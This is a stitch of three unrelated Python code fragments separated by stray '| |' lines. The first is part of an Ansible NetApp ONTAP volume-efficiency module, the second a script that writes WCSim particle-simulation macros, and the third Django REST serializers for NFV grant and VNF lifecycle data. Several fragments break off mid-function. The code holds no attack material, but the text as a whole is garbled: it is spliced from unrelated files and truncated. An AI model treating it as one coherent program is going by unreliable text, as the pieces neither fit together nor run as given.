Initialize the ONTAP Volume Efficiency class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present', 'absent'], default='present'),
vserver=dict(required=True, type='str'),
path=dict(required=True, type='str'),
schedule=dict(required=False, type='str'),
policy=dict(required=False, choices=['auto', 'default', 'inline-only', '-'], type='str'),
enable_inline_compression=dict(required=False, type='bool'),
enable_compression=dict(required=False, type='bool'),
enable_inline_dedupe=dict(required=False, type='bool'),
enable_data_compaction=dict(required=False, type='bool'),
enable_cross_volume_inline_dedupe=dict(required=False, type='bool'),
enable_cross_volume_background_dedupe=dict(required=False, type='bool'),
storage_efficiency_mode=dict(required=False, choices=['default', 'efficient'], type='str'),
volume_efficiency=dict(required=False, choices=['start', 'stop'], type='str'),
start_ve_scan_all=dict(required=False, type='bool'),
start_ve_build_metadata=dict(required=False, type='bool'),
start_ve_delete_checkpoint=dict(required=False, type='bool'),
start_ve_queue_operation=dict(required=False, type='bool'),
start_ve_scan_old_data=dict(required=False, type='bool'),
start_ve_qos_policy=dict(required=False, choices=['background', 'best-effort'], type='str', default='best-effort'),
stop_ve_all_operations=dict(required=False, type='bool')
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True,
required_if=[('start_ve_scan_all', True, ['start_ve_scan_old_data'])],
mutually_exclusive=[('policy', 'schedule')]
)
# set up variables
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
if self.parameters['state'] == 'present':
self.parameters['enabled'] = 'enabled'
else:
self.parameters['enabled'] = 'disabled'
if 'volume_efficiency' in self.parameters:
if self.parameters['volume_efficiency'] == 'start':
self.parameters['status'] = 'running'
else:
self.parameters['status'] = 'idle'
self.rest_api = OntapRestAPI(self.module)
self.use_rest = self.rest_api.is_rest()
if not self.use_rest:
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=self.parameters['vserver'])
if self.parameters.get('storage_efficiency_mode') is not None:
self.rest_api.fail_if_not_rest_minimum_version('option storage_efficiency_mode', 9, 10, 1)
def get_volume_efficiency(self):
"""
get the storage efficiency for a given path
:return: dict of sis if exist, None if not
"""
return_value = None
if self.use_rest:
api = 'private/cli/volume/efficiency'
query = {
'fields': 'path,volume,state,op_status,schedule,compression,inline_compression,inline_dedupe,policy,data_compaction,'
'cross_volume_inline_dedupe,cross_volume_background_dedupe',
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
if self.parameters.get('storage_efficiency_mode') is not None:
query['fields'] += ',storage_efficiency_mode'
message, error = self.rest_api.get(api, query)
record, error = rrh.check_for_0_or_1_records(api, message, error)
if error:
self.module.fail_json(msg=error)
if record is None:
return None
return_value = {
'path': record['path'],
'enabled': record['state'],
'status': record['op_status'],
'schedule': record['schedule'],
'enable_inline_compression': record['inline_compression'],
'enable_compression': record['compression'],
'enable_inline_dedupe': record['inline_dedupe'],
'enable_data_compaction': record['data_compaction'],
'enable_cross_volume_inline_dedupe': record['cross_volume_inline_dedupe'],
'enable_cross_volume_background_dedupe': record['cross_volume_background_dedupe']
}
return_value['policy'] = record.get('policy', '-')
if self.parameters.get('storage_efficiency_mode') is not None:
# force a value to force a change - and an error if the system is not AFF
return_value['storage_efficiency_mode'] = record.get('storage_efficiency_mode', '-')
return return_value
else:
sis_get_iter = netapp_utils.zapi.NaElement('sis-get-iter')
sis_status_info = netapp_utils.zapi.NaElement('sis-status-info')
sis_status_info.add_new_child('path', self.parameters['path'])
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(sis_status_info)
sis_get_iter.add_child_elem(query)
result = self.server.invoke_successfully(sis_get_iter, True)
try:
if result.get_child_by_name('attributes-list'):
sis_status_attributes = result['attributes-list']['sis-status-info']
return_value = {
'path': sis_status_attributes['path'],
'enabled': sis_status_attributes['state'],
'status': sis_status_attributes['status'],
'schedule': sis_status_attributes['schedule'],
'enable_inline_compression': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-inline-compression-enabled')
),
'enable_compression': self.na_helper.get_value_for_bool(True, sis_status_attributes.get_child_content('is-compression-enabled')),
'enable_inline_dedupe': self.na_helper.get_value_for_bool(True, sis_status_attributes.get_child_content('is-inline-dedupe-enabled')),
'enable_data_compaction': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-data-compaction-enabled')
),
'enable_cross_volume_inline_dedupe': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-cross-volume-inline-dedupe-enabled')
),
'enable_cross_volume_background_dedupe': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-cross-volume-background-dedupe-enabled')
)
}
if sis_status_attributes.get_child_by_name('policy'):
return_value['policy'] = sis_status_attributes['policy']
else:
return_value['policy'] = '-'
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error getting volume efficiency for path %s on vserver %s: %s' % (
self.parameters['path'], self.parameters['vserver'], to_native(error)), exception=traceback.format_exc()
)
return return_value
def enable_volume_efficiency(self):
"""
Enables Volume efficiency for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency/on'
body = dict()
query = {
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
message, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg=error)
elif message['num_records'] == 0:
error = 'Error enabling storage efficiency for path %s on vserver %s as the path provided does not exist.' % (self.parameters['path'],
self.parameters['vserver'])
self.module.fail_json(msg=error)
else:
sis_enable = netapp_utils.zapi.NaElement("sis-enable")
sis_enable.add_new_child("path", self.parameters['path'])
try:
self.server.invoke_successfully(sis_enable, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error enabling storage efficiency for path %s on vserver %s: %s' % (self.parameters['path'],
self.parameters['vserver'], to_native(error)), exception=traceback.format_exc())
def disable_volume_efficiency(self):
"""
Disables Volume efficiency for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency/off'
body = dict()
query = {
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
dummy, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg=error)
else:
sis_disable = netapp_utils.zapi.NaElement("sis-disable")
sis_disable.add_new_child("path", self.parameters['path'])
try:
self.server.invoke_successfully(sis_disable, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error disabling storage efficiency for path %s: %s' % (self.parameters['path'], to_native(error)),
exception=traceback.format_exc())
def modify_volume_efficiency(self):
"""
Modifies volume efficiency settings for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency'
body = dict()
query = {
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
if 'schedule' in self.parameters:
body['schedule'] = self.parameters['schedule']
if 'policy' in self.parameters:
body['policy'] = self.parameters['policy']
if 'enable_compression' in self.parameters:
body['compression'] = self.parameters['enable_compression']
if 'enable_inline_compression' in self.parameters:
body['inline_compression'] = self.parameters['enable_inline_compression']
if 'enable_inline_dedupe' in self.parameters:
body['inline_dedupe'] = self.parameters['enable_inline_dedupe']
if 'enable_data_compaction' in self.parameters:
body['data_compaction'] = self.parameters['enable_data_compaction']
if 'enable_cross_volume_inline_dedupe' in self.parameters:
body['cross_volume_inline_dedupe'] = self.parameters['enable_cross_volume_inline_dedupe']
if 'enable_cross_volume_background_dedupe' in self.parameters:
body['cross_volume_background_dedupe'] = self.parameters['enable_cross_volume_background_dedupe']
if 'storage_efficiency_mode' in self.parameters:
body['storage_efficiency_mode'] = self.parameters['storage_efficiency_mode']
dummy, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg='Error in volume/efficiency patch: %s' % error)
else:
sis_config_obj = netapp_utils.zapi.NaElement("sis-set-config")
sis_config_obj.add_new_child('path', self.parameters['path'])
if 'schedule' in self.parameters:
sis_config_obj.add_new_child('schedule', self.parameters['schedule'])
if 'policy' in self.parameters:
sis_config_obj.add_new_child('policy-name', self.parameters['policy'])
if 'enable_compression' in self.parameters:
sis_config_obj.add_new_child('enable-compression', self.na_helper.get_value_for_bool(False, self.parameters['enable_compression']))
if 'enable_inline_compression' in self.parameters:
| |
import argparse
import subprocess
import random
import math
import os
class sWCSimGenerateData(object):
def __init__(self):
# Set parameters to choose.
#
parser = argparse.ArgumentParser(description="Generate several .root files of data for "
"different particles, energy, directions and initial positions "
"of the WCSim")
group = parser.add_argument_group()
group.add_argument("-l", "--levels", dest="levels", type=int, default=1,
help="Number of different levels of energy to simulate. "
"If levels=1, only needed the min energy.")
group.add_argument("-b", "--batch", dest="batch", type=int, default=1,
help="Batch of simulations with the same level of energy.")
group.add_argument("-v", "--events", dest="events", type=int, default=10,
help="Number of events per simulation.")
group.add_argument("-g", "--geometry", dest="geometry", type=str,
choices=['SuperK', 'SuperK_20inchPMT_20perCent ',
'SuperK_20inchBandL_20perCent', 'nuPRISM',
'SuperK_12inchBandL_15perCent ',
'SuperK_20inchBandL_14perCent',
'HyperK',
'HyperKWithOD',
'HyperK_20perCent',
'Cylinder_60x74_20inchBandL_14perCent',
'Cylinder_60x74_20inchBandL_40perCent',
'Cylinder_12inchHPD_15perCent',
'EggShapedHyperK',
'EggShapedHyperK_withHPD'], default='SuperK',
help="Set geometry of the tank, default geometry: SuperK.")
group.add_argument("-q", "--particle", dest="particle", type=str, default="e-",
choices=["e-", "pi0", "mu-", "gamma"],
help="Particle to shoot from G4 Particle Gun.")
group.add_argument("-i", "--min_energy", dest="min_energy", type=float, default=100.0,
help="Set MIN energy of the range of simulations, in MeV")
group.add_argument("-a", "--max_energy", dest="max_energy", type=float, default=1000.0,
help="Set MAX energy of the range of simulations, in MeV")
parser.add_argument("-o", type=str, dest="output_file", default=None,
help="Output file name. Default: results/wcsim_output_<particle>_<energy>_<gen_id>.root")
parser.add_argument("-di", "--directory-destination", type=str,
dest="relative_dir_name", default="", help="Name of relative directory for output.")
parser.add_argument("-d", "--direction", dest="direction",
type=float, nargs=3, help="Initial direction of particle. Default: 1,0,0")
parser.add_argument("-p", "--position", dest="position",
type=float, nargs=3, help="Initial position of particle. Default: 0,0,0")
parser.add_argument("-rd", "--random_direction", dest="random_direction", action="store_true",
help="Generates random initial directions for particle.")
parser.add_argument("-rp", "--random_position", dest="random_position", action="store_true",
help="Generates random initial positions in the tank for the particle.")
parser.add_argument("-sd", "--swept_direction", dest="swept_direction", action="store_true",
help="Generates simulations in disctints angles ( in order ) in the plane xy.")
self._args = parser.parse_args()
def get_str_energy(self, x):
if x < 0.001:
return "{} eV".format(round(x * 1000000, 4))
if x < 1:
return "{} keV".format(round(x * 1000, 4))
if x < 1000:
return "{} MeV".format(round(x, 4))
if x < 1000000:
return "{} GeV".format(round(x / 1000.0, 4))
else:
return "{} TeV".format(round(x / 1000000.0, 4))
def generate_macro(self, particle, energy, events, direction, position, output_dir_name,
output_file_name, geometry=None):
with open("WCSim.mac", "w") as macro:
macro.write("# Sample setup macro with no visualization. Generated with python3 script.\n")
macro.write("/run/verbose 1\n")
macro.write("/tracking/verbose 0\n")
macro.write("/hits/verbose 0\n\n")
macro.write("## select the geometry\n")
macro.write("# Default config if you do nothing is currently SuperK\n\n")
if geometry:
geometry_config = "/WCSim/WCgeom " + geometry + "\n"
macro.write(geometry_config)
else:
macro.write("/WCSim/WCgeom SuperK \n")
macro.write("# Select which PMT to use: \n")
macro.write("# /WCSim/nuPRISM/SetPMTType PMT8inch \n")
macro.write("# /WCSim/nuPRISM/SetPMTPercentCoverage 40 \n")
macro.write("# Set height of nuPRISM inner detector \n")
macro.write("# /WCSim/nuPRISM/SetDetectorHeight 6. m \n")
macro.write("# Set vertical position of inner detector, in beam coordinates\n")
macro.write("# /WCSim/nuPRISM/SetDetectorVerticalPosition 0. m\n")
macro.write("# Set diameter of inner detector\n")
macro.write("# /WCSim/nuPRISM/SetDetectorDiameter 8. m\n")
macro.write("\n# Set Gadolinium doping (concentration is in percent)\n")
macro.write("# /WCSim/DopingConcentration 0.1\n")
macro.write("# /WCSim/DopedWater false\n")
macro.write("# /WCSim/Construct\n")
macro.write("\n# Use mPMTs settings (uncomment/delete the above)\n")
macro.write("# /WCSim/WCgeom nuPRISM_mPMT\n")
macro.write("# /WCSim/WCgeom nuPRISMShort_mPMT\n")
macro.write("# Set Gadolinium doping (concentration is in percent)\n")
macro.write("# /WCSim/DopingConcentration 0.1\n")
macro.write("# /WCSim/DopedWater false\n")
macro.write("#/WCSim/Construct\n")
macro.write("## OR for single mPMT mode or updating mPMT parameters:\n")
macro.write("#/control/execute macros/mPMT_nuPrism1.mac\n")
macro.write("## mPMT options: mPMT_nuPrism1.mac and 2.mac\n")
macro.write("\n# Added for the PMT QE option 08/17/10 (XQ)\n")
macro.write("# 1. Stacking only mean when the photon is generated\n")
macro.write("# the QE is applied to reduce the total number of photons\n")
macro.write("# 2. Stacking and sensitivity detector\n")
macro.write("# In the stacking part, the maximum QE is applied to reduce\n")
macro.write("# the total number of photons\n")
macro.write("# On the detector side, the rest of QE are applied according to QE/QE_max\n")
macro.write("# distribution. This option is in particular important for the WLS\n")
macro.write("# 3. The third option means all the QE are applied at the detector\n")
macro.write("# Good for the low energy running.\n")
macro.write("# 4. Switch off the QE, ie. set it at 100%\n")
macro.write("/WCSim/PMTQEMethod Stacking_Only\n")
macro.write("#/WCSim/PMTQEMethod Stacking_And_SensitiveDetector\n")
macro.write("#/WCSim/PMTQEMethod SensitiveDetector_Only\n")
macro.write("#/WCSim/PMTQEMethod DoNotApplyQE\n")
macro.write("#turn on or off the collection efficiency\n")
macro.write("/WCSim/PMTCollEff on\n")
macro.write("# command to choose save or not save the pi0 info 07/03/10 (XQ)\n")
macro.write("/WCSim/SavePi0 false\n")
macro.write("#choose the Trigger & Digitizer type (and options)\n")
macro.write("/DAQ/Digitizer SKI\n")
macro.write("/DAQ/Trigger NDigits\n")
macro.write("#grab the other DAQ options (thresholds, timing windows, etc.)\n")
macro.write("/control/execute macros/daq.mac\n")
macro.write(
"\n# default dark noise frequency (and conversion factor) is PMT property (NEW), set in the code.\n")
macro.write("# Below gives possibility to overwrite nominal values, eg. to switch OFF the Dark Noise.\n")
macro.write("# /DarkRate/SetDarkRate 0 kHz #Turn dark noise off\n")
macro.write("/DarkRate/SetDarkRate 4.2 kHz # This is the value for SKI set in SKDETSIM.\n")
macro.write("# /DarkRate/SetDarkRate 8.4 kHz #For 20 inch HPDs and Box and Line PMTs,"
" based on High QE 20in R3600 dark rate from EGADS nov 2014\n")
macro.write("# /DarkRate/SetDarkRate 3.0 kHz #For 12 inch HPDs and Box and Line PMTs,"
" based on High QE 20in R3600 dark rate from EGADS nov 2014\n")
macro.write("\n# command to multiply the dark rate.\n")
macro.write("# Convert dark noise frequency before digitization "
"to after digitization by setting suitable factor\n")
macro.write("# Again, this is now a PMT property and can be overridden here\n")
macro.write("/DarkRate/SetConvert 1.367 # For Normal PMT\n")
macro.write("# /DarkRate/SetConvert 1.119 #For HPDs\n")
macro.write("# /DarkRate/SetConvert 1.126 #For Box and Line PMTs\n")
macro.write("\n# Select which time window(s) to add dark noise to\n")
macro.write("# /DarkRate/SetDarkMode 0 to add dark noise to a time window starting at\n")
macro.write("# /DarkRate/SetDarkLow to /DarkRate/SetDarkHigh [time in ns]\n")
macro.write("# /DarkRate/SetDarkMode 1 adds dark noise hits to a window of\n")
macro.write("# width /DarkRate/SetDarkWindow [time in ns] around each hit\n")
macro.write("# i.e. hit time +- (/DarkRate/SetDarkWindow) / 2\n")
macro.write("/DarkRate/SetDarkMode 1\n")
macro.write("/DarkRate/SetDarkHigh 100000\n")
macro.write("/DarkRate/SetDarkLow 0\n")
macro.write("/DarkRate/SetDarkWindow 4000\n")
macro.write("# Uncomment one of the lines below if you want to use the OGLSX or RayTracer visualizer\n")
macro.write("# /control/execute macros/visOGLSX.mac\n")
macro.write("# /control/execute macros/visRayTracer.mac\n")
macro.write("# /control/execute macros/visOGLQT.mac ## NEW\n")
macro.write("## select the input nuance-formatted vector file\n")
macro.write("## you can of course use your own\n")
macro.write("# /mygen/generator muline\n")
macro.write("# /mygen/vecfile inputvectorfile\n")
macro.write("# /mygen/vecfile h2o.2km.001-009x3_G4.kin\n")
macro.write("# /mygen/vecfile mu+.out\n")
macro.write("\n# Or you can use the G4 Particle Gun\n")
macro.write("# for a full list of /gun/ commands see:\n")
macro.write("# http://geant4.web.cern.ch/geant4/G4UsersDocuments/"
"UsersGuides/ForApplicationDeveloper/html/Control/UIcommands/_gun_.html\n")
macro.write("/mygen/generator gun\n")
macro.write(f"/gun/particle {particle}\n")
macro.write(f"/gun/energy {energy}\n")
macro.write(f"/gun/direction {direction[0]} {direction[1]} {direction[2]}\n")
macro.write(f"/gun/position {position[0]} {position[1]} {position[2]}\n")
macro.write("\n# Or you can use the G4 General Particle Source\n")
macro.write(
"# you can do a lot more with this than a monoenergetic, monodirectional, single-particle gun\n")
macro.write("# for a full list of /gps/ commands see:\n")
macro.write("# https://geant4.web.cern.ch/geant4/UserDocumentation/UsersGuides"
"/ForApplicationDeveloper/html/ch02s07.html\n")
macro.write("# /mygen/generator gps\n")
macro.write("# /gps/particle e-\n")
macro.write("# /gps/energy 500 MeV\n")
macro.write("# /gps/direction 1 0 0\n")
macro.write("# /gps/position 0 0 0\n")
macro.write("\n# Or you can use the laser option\n")
macro.write("# This is equivalent to the gps command, except that the "
"gps particle energies are saved ignoring their mass\n")
macro.write("# for a full list of /gps/ commands see:\n")
macro.write("# https://geant4.web.cern.ch/geant4/UserDocumentation/UsersGuides"
"/ForApplicationDeveloper/html/ch02s07.html\n")
macro.write("# It is used for laser calibration simulation\n")
macro.write("# /mygen/generator laser\n")
macro.write("# /gps/particle opticalphoton\n")
macro.write("# /gps/energy 2.505 eV\n")
macro.write("# /gps/direction 1 0 0\n")
macro.write("# /gps/position 0 0 0\n")
macro.write("# /gps/number 1000\n")
macro.write("# /gps/ang/type iso\n")
macro.write("# /gps/ang/mintheta 0 deg\n")
macro.write("# /gps/ang/maxtheta 30 deg\n")
macro.write("# /gps/ang/minphi 0 deg\n")
macro.write("# /gps/ang/maxphi 360 deg\n")
macro.write("\n##### NEW\n")
macro.write("/Tracking/fractionOpticalPhotonsToDraw 0.0\n")
macro.write(f"\n## change the name of the output root file, default = wcsim_output_<energy>"
"_<particle>_<gen_id>.root\n")
macro.write(f"/WCSimIO/RootFile {output_dir_name}/{output_file_name}\n")
macro.write("\n## Boolean to select whether to save the NEUT "
"RooTracker vertices in the output file, provided "
"you used\n")
macro.write("## a NEUT vector file as input\n")
macro.write("/WCSimIO/SaveRooTracker 0\n")
macro.write("\n## set a timer running on WCSimRunAction\n")
macro.write("# /WCSimIO/Timer false\n")
macro.write(f"/run/beamOn {events}\n")
macro.write("#exit\n")
def execute(self):
path = os.path.dirname(os.path.abspath(__file__))
output_dir_name = "./results" + self._args.relative_dir_name
os.makedirs(os.path.join(path, output_dir_name), exist_ok=True)
if self._args.direction:
direction = self._args.direction
else:
direction = [1, 0, 0]
if self._args.position:
position = self._args.position
else:
position = [0, 0, 0]
for levels in range(self._args.levels):
energyInMeV = (levels / self._args.levels) * (self._args.max_energy - self._args.min_energy) + \
self._args.min_energy
strEnergy = self.get_str_energy(energyInMeV)
# Generates a random offset ( starting angle ) for the swept
if self._args.swept_direction:
angle_offset = random.random() * 2 * math.pi
for batch in range(self._args.batch):
gen_id = str(batch) if batch >= 10 else "0{0}".format(batch)
if self._args.random_position:
px = 200 * random.random() - 100
py = 200 * random.random() - 100
pz = 200 * random.random() - 100
position = [px, py, pz]
if self._args.random_direction:
x = random.random()
| |
)
subnetId = serializers.CharField(
help_text="Subnet defined by the identifier of the subnet resource in the VIM.",
required=False,
allow_null=True,
allow_blank=True
)
class IpOverEthernetAddressSerializer(serializers.Serializer):
macAddress = serializers.CharField(
help_text="MAC address.",
required=False,
allow_null=True,
allow_blank=True
)
ipAddresses = IpAddresseSerializer(
help_text="List of IP addresses to assign to the CP instance.",
many=True,
required=False
)
class CpProtocolDataConfigSerializer(serializers.Serializer):
layerProtocol = serializers.ChoiceField(
help_text="Identifier of layer(s) and protocol(s).",
choices=enum_to_list(LAYER_PROTOCOL),
required=True
)
ipOverEthernet = IpOverEthernetAddressSerializer(
help_text="Network address data for IP over Ethernet to assign to the extCP instance.",
required=False,
allow_null=True,
)
class VnfExtCpConfigDataSerializer(serializers.Serializer):
cpInstanceId = serializers.CharField(
help_text="Identifier of the external CP instance to which this set of configuration parameters is requested to be applied.",
required=False,
allow_null=True,
allow_blank=True
)
linkPortId = serializers.CharField(
help_text="Identifier of a pre-configured link port to which the external CP will be associated.",
required=False,
allow_null=True,
allow_blank=True
)
cpProtocolData = CpProtocolDataConfigSerializer(
help_text="Parameters for configuring the network protocols on the link port that connects the CP to a VL.",
many=True,
required=False
)
class VnfExtCpSerializer(serializers.Serializer):
cpdId = serializers.CharField(
help_text="The identifier of the CPD in the VNFD.",
required=True
)
cpConfig = VnfExtCpConfigDataSerializer(
help_text="List of instance data that need to be configured on the CP instances created from the respective CPD.",
many=True,
required=False
)
class ExtLinkPortSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of this link port as provided by the entity that has created the link port.",
required=True
)
resourceHandle = serializers.CharField(
help_text="Reference to the virtualised resource realizing this link port.",
required=True
)
class ExtVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="The identifier of the external VL instance.",
required=True
)
vimConnectionId = serializers.CharField(
help_text="Identifier of the VIM connection to manage this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceProviderId = serializers.CharField(
help_text="Identifies the entity responsible for the management of this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceId = serializers.CharField(
help_text="The identifier of the resource in the scope of the VIM or the resource provider.",
required=True
)
extCps = VnfExtCpSerializer(
help_text="External CPs of the VNF to be connected to this external VL.",
many=True,
required=False
)
extLinkPorts = ExtLinkPortSerializer(
help_text="Externally provided link ports to be used to connect external connection points to this external VL.",
many=True,
required=False
)
class ExtManagedVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="The identifier of the externally-managed internal VL instance.",
required=True
)
virtualLinkDescId = serializers.CharField(
help_text="The identifier of the VLD in the VNFD for this VL.",
required=True
)
vimConnectionId = serializers.CharField(
help_text="Identifier of the VIM connection to manage this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceProviderId = serializers.CharField(
help_text="Identifies the entity responsible for the management of this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceId = serializers.CharField(
help_text="The identifier of the resource in the scope of the VIM or the resource provider.",
required=True
)
class GrantLinksSerializer(serializers.Serializer):
self = LinkSerializer(
help_text="URI of this resource.",
required=True
)
vnfLcmOpOcc = LinkSerializer(
help_text="Related VNF lifecycle management operation occurrence.",
required=True
)
vnfInstance = LinkSerializer(
help_text="Related VNF instance.",
required=True
)
class GrantSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the grant.",
required=True
)
vnfInstanceId = serializers.CharField(
help_text="Identifier of the related VNF instance.",
required=True
)
vnfLcmOpOccId = serializers.CharField(
help_text="Identifier of the related VNF lifecycle management operation occurrence.",
required=False, # TODO required
allow_null=True,
allow_blank=True
)
vimConnections = VimConnectionInfoSerializer(
help_text="Provides information regarding VIM connections that are approved to be used by the VNFM to allocate resources.",
many=True,
required=False
)
zones = ZoneInfoSerializer(
help_text="Identifies resource zones where the resources are approved to be allocated by the VNFM.",
many=True,
required=False
)
zoneGroups = ZoneGroupInfoSerializer(
help_text="Information about groups of resource zones.",
many=True,
required=False
)
computeReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the compute resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
networkReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the network resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
storageReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the storage resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
addResources = GrantInfoSerializer(
help_text="List of resources that are approved to be added.",
many=True,
required=False
)
tempResources = GrantInfoSerializer(
help_text="List of resources that are approved to be temporarily instantiated during the runtime of the lifecycle operation.",
many=True,
required=False
)
removeResources = GrantInfoSerializer(
help_text="List of resources that are approved to be removed.",
many=True,
required=False
)
updateResources = GrantInfoSerializer(
help_text="List of resources that are approved to be modified.",
many=True,
required=False
)
vimAssets = VimAssetsSerializer(
help_text="Information about assets for the VNF that are managed by the NFVO in the VIM.",
required=False,
allow_null=True
)
extVirtualLinks = ExtVirtualLinkSerializer(
help_text="Information about external VLs to connect the VNF to.",
many=True,
required=False
)
extManagedVirtualLinks = ExtManagedVirtualLinkSerializer(
help_text="Information about internal VLs that are managed by other entities than the VNFM.",
many=True,
required=False
)
additionalParams = serializers.DictField(
help_text="Additional parameters passed by the NFVO, \
specific to the VNF and the LCM operation.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
_links = GrantLinksSerializer(
help_text="Links to resources related to this resource.",
required=False
)
class AffectedVnfcSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the Vnfc instance.",
required=True
)
vduId = serializers.CharField(
help_text="Identifier of the related VDU in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(VNFC_CHANGE_TYPE),
required=True
)
computeResource = ResourceHandleSerializer(
help_text="Reference to the VirtualCompute resource.",
required=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
affectedVnfcCpIds = serializers.ListSerializer(
help_text="Identifiers of CP(s) of the VNFC instance that were affected by the change.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
addedStorageResourceIds = serializers.ListSerializer(
help_text="References to VirtualStorage resources that have been added.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
removedStorageResourceIds = serializers.ListSerializer(
help_text="References to VirtualStorage resources that have been removed.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
class AffectedVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the virtual link instance.",
required=True
)
virtualLinkDescId = serializers.CharField(
help_text="Identifier of the related VLD in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(VL_CHANGE_TYPE),
required=True
)
networkResource = ResourceHandleSerializer(
help_text="Reference to the VirtualNetwork resource.",
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
class AffectedVirtualStorageSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the storage instance.",
required=True
)
virtualStorageDescId = serializers.CharField(
help_text="Identifier of the related VirtualStorage descriptor in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(STORAGE_CHANGE_TYPE),
required=True
)
storageResource = ResourceHandleSerializer(
help_text="Reference to the VirtualStorage resource.",
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
class VnfInfoModificationsSerializer(serializers.Serializer):
vnfInstanceName = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfInstanceName attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfInstanceDescription = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfInstanceDescription attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfConfigurableProperties = serializers.DictField(
help_text="If present, this attribute signals modifications of the vnfConfigurableProperties attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="If present, this attribute signals modifications of the metadata attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
extensions = serializers.DictField(
help_text="If present, this attribute signals modifications of the extensions attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
vimConnectionInfo = VimConnectionInfoSerializer(
help_text="If present, this attribute signals modifications of the vimConnectionInfo attribute in VnfInstance.",
many=True,
required=False
)
vnfPkgId = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfPkgId attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfdId = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfdId attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfProvider = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfProvider attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfProductName = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfProductName attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfSoftwareVersion = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfSoftwareVersion attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfdVersion = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfdVersion attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
class ExtLinkPortInfoSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of this link port as provided by the entity that has created the link port.",
required=True
)
resourceHandle = ResourceHandleSerializer(
help_text="Reference to the virtualised resource realizing this link port.",
required=True
)
